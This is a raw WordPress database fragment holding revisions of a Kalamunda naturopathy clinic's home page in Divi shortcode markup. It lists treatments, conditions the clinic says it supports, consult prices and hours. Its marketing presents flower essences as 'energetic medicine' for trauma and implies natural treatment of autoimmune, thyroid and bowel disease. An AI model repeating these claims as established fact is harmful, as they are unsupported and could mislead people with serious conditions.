custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2022-12-24 22:27:38','2022-12-24 14:27:38','',28,'https://verdenaturopathy.com.au/?p=391',0,'revision','',0),(393,1,'2023-05-30 09:24:38','2023-05-30 01:24:38','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $155\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $55\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: 